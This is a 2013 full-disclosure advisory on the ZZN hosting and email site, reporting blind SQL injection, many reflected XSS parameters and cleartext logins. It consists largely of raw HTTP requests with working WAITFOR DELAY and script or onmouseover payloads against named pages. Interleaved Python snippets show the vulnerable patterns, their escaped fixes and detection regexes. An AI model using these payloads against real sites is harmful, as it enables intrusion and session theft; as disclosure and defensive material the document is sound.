ZZN (Web Hosting and Free email accounts) suffers from cross site scripting, remote blind SQL injection, and credential disclosure vulnerabilities.
ZZN (Web Hosting and Free email accounts) Blind SQL Injection / Cross Site Scripting / User credentials are sent in clear text
==================================================================================================================================================
Report-Timeline:
================
2013-07-18: Researcher Notification I
2013-07-19: Researcher Notification II
2013-07-20: Researcher Notification III
2013-07-20: Vendor Feedback
2013-07-22: Asked About the Issues I / No Response
2013-07-23: Asked About the Issues II / No Response
2013-07-26: No Response / Not Fixed
2013-08-02: No Response / Not Fixed
2013-08-09: Full Disclosure
I-VULNERABILITIES
======================
#Title: ZZN (Web Hosting and Free email accounts) Blind SQL Injection / Cross Site Scripting / User credentials are sent in clear text
#Vendor: http://www.zzn.com
#Author: Juan Carlos García (@secnight)
#Follow me
http://highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
ZZN is a web hosting and e-mail service. ZZN mail lets you create your OWN Web site and a customized email service.
Users can sign up and log in to their email from www.your-name.zzn.com, or directly from your website.
-Build a great FREE Website
-Increase site stickiness by having users check their mail from your site.
-Brand your email colors and logos to that of your site.
-Choose from 14 interface languages.
-Promote your site using the tagline attached to every outgoing message.
-Keep in touch with your users using the mailing list feature.
III-PROOF OF CONCEPT
======================
BLIND SQL INJECTION
______________________________________
Blind SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement
without properly filtering out dangerous characters. In the blind variant the application returns no error or data, so the injected statement is confirmed through a side channel such as a measurable time delay.
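As an added illustration (not code from the advisory or from ZZN), the snippet below decodes the `company` field from a copy of the advisory's POST body, shows the string-concatenated query shape that a time-based blind injection implies, the parameterised form that stores the same text as plain data, and a detection check for time-delay payloads. The table and column names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed copy of the relevant part of the advisory's POST body to support_abuse.asp.
SAMPLE_BODY = (
    "beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20"
    "&Complaint=secnight&FirstName=secnight&LastName=secnight"
)

# Time-delay primitives used by blind injection on common database engines.
TIME_BASED = re.compile(r"waitfor\s+delay|\bsleep\s*\(|pg_sleep\s*\(|benchmark\s*\(", re.IGNORECASE)


def company_from_body(body: str) -> str:
    """URL-decode the form body and return the 'company' field as the server sees it."""
    return parse_qs(body, keep_blank_values=True)["company"][0]


def build_query_unsafe(company: str) -> str:
    """The pattern the finding implies: the field is pasted into the SQL text.
    The closing quote, the ';' and the '--' comment become part of the statement,
    so a SQL Server backend would run the injected WAITFOR DELAY as a second statement.
    (Hypothetical table and column names.)"""
    return "INSERT INTO abuse_reports (company) VALUES ('" + company + "')"


def store_company_safe(conn: sqlite3.Connection, company: str) -> str:
    """Hardened form: the value is bound as a parameter, never as SQL text.
    Returns what was stored, which is the whole payload as an ordinary string."""
    conn.execute("CREATE TABLE IF NOT EXISTS abuse_reports (company TEXT)")
    conn.execute("INSERT INTO abuse_reports (company) VALUES (?)", (company,))
    return conn.execute("SELECT company FROM abuse_reports").fetchone()[0]


def looks_like_time_based_sqli(value: str) -> bool:
    """Detection check for a WAF rule or log review: does a field carry a delay primitive?"""
    return TIME_BASED.search(value) is not None


if __name__ == "__main__":
    payload = company_from_body(SAMPLE_BODY)
    print("decoded company field:", repr(payload))
    print("unsafe SQL text      :", build_query_unsafe(payload))
    print("stored by safe insert:", repr(store_company_safe(sqlite3.connect(":memory:"), payload)))
    print("flagged by detector  :", looks_like_time_based_sqli(payload))
```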
Attacks
-------
1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=
Multiple CROSS SITE SCRIPTING
_______________________________
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,
it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application
to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
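The two reflection contexts behind the findings below, as an added example that is not code from the advisory or from ZZN: the `message` parameter of alertwindow.asp lands in page text, the `fromPage` parameter of insidelogin.asp lands inside a quoted attribute. Each vulnerable render is shown beside its entity-encoded form, with a detection check that a response reflects the payload unencoded. The surrounding markup is assumed; the payloads are decoded from the advisory's GET URLs.

```python
import html
import re
from urllib.parse import unquote

# Payloads decoded from the advisory's GET examples.
MESSAGE_PAYLOAD = unquote("%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e")
FROMPAGE_PAYLOAD = unquote("%22%20onmouseover%3dprompt%28908665%29%20bad%3d%22")

# A script tag or an on*= event-handler attribute is what makes a reflection executable.
SCRIPT_OR_HANDLER = re.compile(r"<\s*script|\bon[a-z]+\s*=", re.IGNORECASE)


def render_alert_vulnerable(message: str) -> str:
    """Text context, reflected as-is (assumed markup around the parameter)."""
    return "<div class='alert'>" + message + "</div>"


def render_alert_safe(message: str) -> str:
    """Text context: entity-encode < > & and both quote characters."""
    return "<div class='alert'>" + html.escape(message, quote=True) + "</div>"


def render_hidden_vulnerable(from_page: str) -> str:
    """Attribute context, reflected as-is; a leading quote breaks out of value=""."""
    return '<input type="hidden" name="fromPage" value="' + from_page + '">'


def render_hidden_safe(from_page: str) -> str:
    """Attribute context: the value must be quoted AND entity-encoded (quote=True)."""
    return '<input type="hidden" name="fromPage" value="' + html.escape(from_page, quote=True) + '">'


def reflects_executable_markup(page: str, payload: str) -> bool:
    """Detection check for a scanner or a regression test: the payload appears in the
    response byte-for-byte and carries a script tag or an event handler."""
    return payload in page and SCRIPT_OR_HANDLER.search(payload) is not None


if __name__ == "__main__":
    for name, vuln, safe, payload in (
        ("alertwindow.asp message", render_alert_vulnerable, render_alert_safe, MESSAGE_PAYLOAD),
        ("insidelogin.asp fromPage", render_hidden_vulnerable, render_hidden_safe, FROMPAGE_PAYLOAD),
    ):
        print(name, "vulnerable:", reflects_executable_markup(vuln(payload), payload),
              "hardened:", reflects_executable_markup(safe(payload), payload))
```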
Affected items
/membersarea_en/alertwindow.asp
/membersarea_en/copy%20of%20emailaccount.asp
/membersarea_en/directemailerror.asp
/membersarea_en/home.asp
/membersarea_en/insidelogin.asp
/membersarea_en/joinframes.asp
/membersarea_en/loginerror.asp
/membersarea_en/preminder.asp
/membersarea_en/signup.asp
/membersarea_en/support_abuse.asp
Proof Of Concept
----------------
These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 input
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 input
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 input
/membersarea_en/alertwindow.asp - 1 input
/membersarea_en/loginerror.asp - 1 input
/membersarea_en/support_abuse.asp - 1 input
/membersarea_en/copy%20of%20emailaccount.asp - 1 input
/membersarea_en/directregister.asp - 1 input
/zlog - 1 input
/zlog/blog_error.asp - 1 input
TOO MANY Cross Site Scripting
There are many more variants of both methods; the requests below are only examples of these failures.
Method GET
----------
http://www.zzn.com/membersarea_en/alertwindow.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903379%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/directemailerror.asp?message=915766%27%28%29920634
http://www.zzn.com/membersarea_en/insidelogin.asp?fromPage=%22%20onmouseover%3dprompt%28908665%29%20bad%3d%22
http://www.zzn.com/membersarea_en/joinframes.asp?main=join&type=%22%20onmouseover%3dprompt%28922666%29%20bad%3d%22
http://www.zzn.com/membersarea_en/loginerror.asp?message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28958884%29%3c%2fScRiPt%3e
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28910568%29%20bad%3d%22&LastName=&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=%22%20onmouseover%3dprompt%28939138%29%20bad%3d%22&LastName=&type=website
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28927027%29%20bad%3d%22&type=webmaster
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28949012%29%20bad%3d%22&type=community
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28967610%29%20bad%3d%22&type=family
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=%22%20onmouseover%3dprompt%28960668%29%20bad%3d%22&type=website
http://www.zzn.com/membersarea_en/signup.asp?EMailDomain=&FirstName=&LastName=&type=%22%20onmouseover%3dprompt%28942440%29%20bad%3d%22
Method POST
-----------
POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
company=SECNIGHT&firstname=%22%20onmouseover%3dprompt%28968469%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1
POST /membersarea_en/copy%20of%20emailaccount.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
company=secnight&firstname=%22%20onmouseover%3dprompt%28960576%29%20bad%3d%22&Interface=0&lastname=secnight&LoginPage=1
POST /membersarea_en/home.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
DoLogin=True&image1=&LogFlag=1&SubDomain=999971%22%28%29997917&UserPassword=
POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=secnight
POST /membersarea_en/insidelogin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
DoLogin=True&FromFrames=True&FromWhere=false&image1=&origPage=20&SubDomain=986581%28%29996458&UserPassword=g00dPa$$w0rD
POST /membersarea_en/preminder.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
NotFirstTime=true&rqHintSubDomain=%22%20onmouseover%3dprompt%28956443%29%20bad%3d%22
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=%22%20onmouseover%3dprompt%28927344%29%20bad%3d%22&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.esS&NOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type=website HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=%22%20onmouseover%3dprompt%28961485%29%20bad%3d%22&Phone=555-666-
0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Length: 325
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=%22%20onmouseover%3dprompt%28948601%29%20bad%3d
%22&ReEMail=sample@email.tst&reUserPassword=g00dPa$$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
POST /membersarea_en/signup.asp?type= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=__&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=%22%20onmouseover%3dprompt%28967492%29%20bad%3d%22&yob=0&zip=94102
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
beenThere=secnight&company=highsec&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=%22%20onmouseover
%3dprompt%28983845%29%20bad%3d%22&VirtIP=
USER CREDENTIALS ARE SENT IN CLEAR TEXT
_______________________________________
User credentials are not encrypted when they are transmitted. A third party may be able to read them by intercepting the unencrypted HTTP connection. Because user credentials are usually considered sensitive information,
they should be sent to the server only over an encrypted connection.
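One way to check for this class of finding on a page, as an added example that is not code from the advisory or from ZZN: parse every form, note whether it carries a password input, and report the ones whose resolved action URL is not https. The sample page is constructed; its field names (SubDomain, UserPassword, DoLogin) come from the advisory's POST bodies and the layout is assumed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PasswordFormFinder(HTMLParser):
    """Collects each <form> with its resolved action URL and whether it holds a password field."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []          # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative action inherits the scheme of the page that served the form.
            self._current = {"action": urljoin(self.page_url, a.get("action") or ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and (a.get("type") or "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_credential_forms(page_url: str, page_html: str) -> list:
    """Return the action URLs of forms that would send a password over plain HTTP.
    A form with an https action on an http page is still weak (the page itself can be
    tampered with in transit), so the page URL is reported too by a stricter policy."""
    finder = PasswordFormFinder(page_url)
    finder.feed(page_html)
    return [f["action"] for f in finder.forms
            if f["has_password"] and urlsplit(f["action"]).scheme != "https"]


# Constructed sample page: a login box posting over http, a signup form posting over https,
# and a form with no credentials at all.
SAMPLE_HTML = """
<form action="/membersarea_en/home.asp" method="post">
  <input type="text" name="SubDomain"><input type="password" name="UserPassword">
  <input type="hidden" name="DoLogin" value="True">
</form>
<form action="https://www.zzn.com/membersarea_en/signup.asp?type=" method="post">
  <input type="password" name="UserPassword">
</form>
<form action="/membersarea_en/support_abuse.asp" method="post"><input type="text" name="company"></form>
"""

if __name__ == "__main__":
    print(cleartext_credential_forms("http://www.zzn.com/membersarea_en/home.asp", SAMPLE_HTML))
```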
Affected items
/membersarea_en/home.asp (13310f83d103a349490b8582539e8e21)
/membersarea_en/home.asp (4aaaffaf70dda99921aec4f1b2ceda9b)
/membersarea_en/insidelogin.asp
/membersarea_en/insidelogin.asp (4ea409a137fbaff8d5b639c5c42f16fb)
/membersarea_en/insidelogin.asp (58b6536a2fd7f196e5ff147122d20d98)
/membersarea_en/insidelogin.asp (67306227331ba5cbb21a0c2aebce7241)
/membersarea_en/insidelogin.asp (b67529bf426329db238325c03ba3ac46)
/membersarea_en/insidelogin.asp (b91e4b1df6bdc5d9e626034018953543)
/membersarea_en/loginbox.asp
/membersarea_en/signup.asp
/membersarea_en/signup.asp (134f342931a2e21525c6aa2cc3172a10)
/membersarea_en/signup.asp (6951aefa9721a0c5da3591ca525d49fe)
/membersarea_en/signup.asp (6afc2b9654e79ff801823fbaf74a6984)
/membersarea_en/signup.asp (80e7b7df44c32c456eb77aa274db4c08)
/membersarea_en/signup.asp (9791cfb3ed5d1e88c7a13337e5afb6da)
/membersarea_en/signup.asp (9b77eec0e71402d51f3f9b4bc0bd36f9)
/membersarea_en/signup.asp (c18e6bf01d3e39b1b9bccf1a50909498)
/membersarea_en/signup.asp (d087acb8154fc2e7ac71718a76ecf9b1)
/membersarea_en/signup.asp (d3c9ccf4d5c2c129b6eaa3c685ad11ef)
/membersarea_en/signup.asp (decad2f3bdc62c80a19d23c110dd40d4)
/membersarea_en/signup.asp (f321b396abface84ca2dc3a5facb1bd4)
/membersarea_en/signup.asp (f9583d9e844817a92b7f0743a7c9becf)
Examples (TOO MANY variants)
POST /membersarea_en/home.asp HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/home.asp?from=g1&s=www.zzn.com
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
DoLogin=True&image1=&LogFlag=1&SubDomain=&UserPassword=
GET /membersarea_en/insidelogin.asp?fromPage=homepagez.asp
POST /membersarea_en/signup.asp?type= HTTP/1.1
Pragma: no-cache
Acunetix-Aspect-Password: 8d3b79cd70a5d7b8b5b273ddce225c7a
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://www.ZZN.COM/membersarea_en/signup.asp
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE
Host: www.ZZN.COM
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
confirm=&Country=AF&DefaultLanguage=1&EMail=sample@email.tst&EMailDomain=sample@email.tst&FirstName=secnight&gender=N&LastName=secnight&Phone=555-666-0606&ReEMail=sample@email.tst&reUserPassword=g00dPa$
$w0rD&SiteURL=http://highsec.es&SNOK=&UserPassword=g00dPa$$w0rD&yob=0&zip=94102
IV. CREDITS
-------------------------
These vulnerabilities have been discovered
by Juan Carlos García (@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.